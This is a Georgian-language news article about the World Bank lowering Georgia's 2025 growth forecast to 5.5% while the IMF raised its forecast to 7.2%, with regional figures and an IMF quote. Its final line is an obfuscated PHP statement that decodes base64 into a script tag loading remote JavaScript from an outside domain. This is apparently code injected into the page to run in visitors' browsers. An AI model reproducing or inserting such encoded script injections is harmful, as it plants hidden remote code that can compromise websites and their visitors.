gorgia
jaluzi

მსოფლიო ბანკმა საქართველოს 2025 წლის ეკონომიკური ზრდის პროგნოზი 0.5 პროცენტული პუნქტით შეამცირა. ახალი პროგნოზით წელს ზრდა აქამდე ნავარაუდევი 6%-ის ნაცვლად, 5.5% იქნება - ამის შესახებ აღნიშნულია გლობალურ ეკონომიკურ მიმოხილვაში, რომელიც მსოფლიო ბანკმა გამოაქვეყნა.

საქართველოს შესახებ დოკუმენტში ნათქვამია, რომ 2024 წელთან შედარებით ზრდა უფრო ნაკლები იქნება და ამის მთავარი განმაპირობებელი ფაქტორი რეექსპორტის და ადგილობრივი მოხმარების მოსალოდნელი შემცირება იქნება.

"ზრდა საქართველოსა და სომხეთში მოსალოდნელია რომ 2024 წელთან შედარებით შემცირდება, რაც შემცირებულ ადგილობრივ მოთხოვნას და რეექსპორტის კლებას უკავშირდება, რის შედეგადაც ამ ქვეყნებში ზრდის პროგნოზი მათ პოტენციურ ზრდის მაჩვენებელს დაუახლოვდება,"- ნათქვამია დოკუმენტში.

მსოფლიო ბანკის თანახმად, რეგიონის ქვეყნებში 2025 წლის ეკონომიკური ზრდის პროგნოზები ასე ნაწილდება:

საქართველო - 5.5%, კლება წინა პროგნოზთან 0.5 პპ;
სომხეთი - 4%, კლება წინა პროგნოზთან 1 პპ;
აზერბაიჯანი - 2.6%, კლება წინა პროგნოზთან 0.1% პპ;
რუსეთი - 1.4%, კლება წინა პროგნოზთან 0.2% პპ;
უკრაინა - 2%, ცვლილება წინა პროგნოზთან 0 პპ;
თურქეთი - 3.1%, ზრდა წინა პროგნოზთან 0.5 პპ.
მნიშვნელოვანია გარემოება, რომ მსოფლიო ბანკისგან მკვეთრად განსხვავებული პროგნოზი აქვს საერთაშორისო სავალუტო ფონდს (IMF), რომელმაც რამდენიმე დღის წინ საქართველოს ეკონომიკური ზრდის პროგნოზი 6%-დან 7.2%-მდე გაზარდა. შესაბამისად, ამ ორ პროგნოზს შორის სხვაობა ამჟამად 1.7 პროცენტულ პუნქტს შეადგენს.

სავალუტო ფონდის მისია აღნიშნავს, რომ წელს საქართველოში იმაზე ძლიერი ეკონომიკური ზრდა არის მოსალოდნელი, ვიდრე თავდაპირველად ვარაუდობდნენ. სავალუტო ფონდმა საკუთარი გადაწყვეტილების პრესრელიზში აღნიშნა:

"შენარჩუნებულია ძლიერი ეკონომიკური აქტივობა. რეალური მშპ 2024 წელს 9.4 პროცენტით გაიზარდა, შიდა პოლიტიკური დაძაბულობის მიუხედავად. ზრდის მამოძრაველები ფაქტორი მოხმარება იყო. წინა წლების ზრდაში კი მთავარი წვლილი ინვესტიციებმა და წმინდა ექსპორტმა შეიტანეს. ტურიზმი აღდგა და თავის კოვიდამდე მაჩვენებელს დაუბრუნდა. საინფორმაციო და საკომუნიკაციო ტექნოლოგიები და სატრანსპორტო სექტორი ქვეყნის ეკონომიკის ზრდის ძირითადი მამოძრავებლები იყვნენ. ეს სექტორები სარგებლობდნენ მიგრანტების მაღალ პროფესიული ცოდნით და მომატებული სატრანზიტო ვაჭრობით. უმუშევრობა კლებას განაგრძობდა, თუმცა კვლავ მაღალი რჩება. 2025 წლის პირველ ოთხ თვეში დაფიქსირებული ზრდის მაღალი მაჩვენებელი მიგვანიშნებს რომ წელს ზრდა 7.2 პროცენტი იქნება, ხოლო შემდგომ 5 პროცენტიან საშუალოვადიანი ზრდის მაჩვენებელს დაუბრუნდება,"- ნათქვამია IMF-ის მისიის განცხადებაში.

რაც შეეხება ფაქტობრივ მაჩვენებლებს, 2025 წლის პირველ 4 თვეში საქართველოს ეკონომიკურმა ზრდამ 8.8% შეადგინა. მიმდინარე წლის ბიუჯეტი 6%-იან ზრდაზე არის დაგეგმილი.

136
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");